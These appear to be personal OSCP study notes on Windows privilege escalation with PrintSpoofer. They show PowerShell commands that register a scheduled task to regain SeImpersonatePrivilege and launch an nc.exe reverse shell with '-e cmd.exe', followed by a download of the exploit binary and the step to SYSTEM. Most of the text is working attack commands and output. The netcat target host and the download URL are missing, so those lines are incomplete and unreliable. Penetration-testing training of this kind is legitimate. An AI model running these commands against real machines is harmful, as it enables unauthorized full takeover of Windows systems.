OSCP Notes

Printspoofer PE(instantly become System!)

  • PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.
    To escalate privileges, the service account must have SeImpersonate privileges.

Steps: 1. Transfer the exe to the victim, and run the command

PrintSpoofer.exe -i -c cmd
Now we've got a rev shell with more privileges
Reading through the privileges we have now, it's confirmed that the SeImpersonatePrivilege is missing but that can be retrieved by creating a ScheduledTaskPrincipal where we can specify SeImpersonatePrivilege in RequiredPrivilege attribute.
# Create a list of privileges
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"
# Create a Principal for the task
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs
# Create an action for the task
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 4445 -e cmd.exe`""
# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal
TaskPath TaskName State
-------- -------- -----
\ GrantAllPerms Ready
# Start the task
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"
SeImpersonatePrivilege is on now! Let's get into the system with printspoofer!
powershell (New-Object Net.WebClient).DownloadFile("","C:\wamp\www\prints.exe")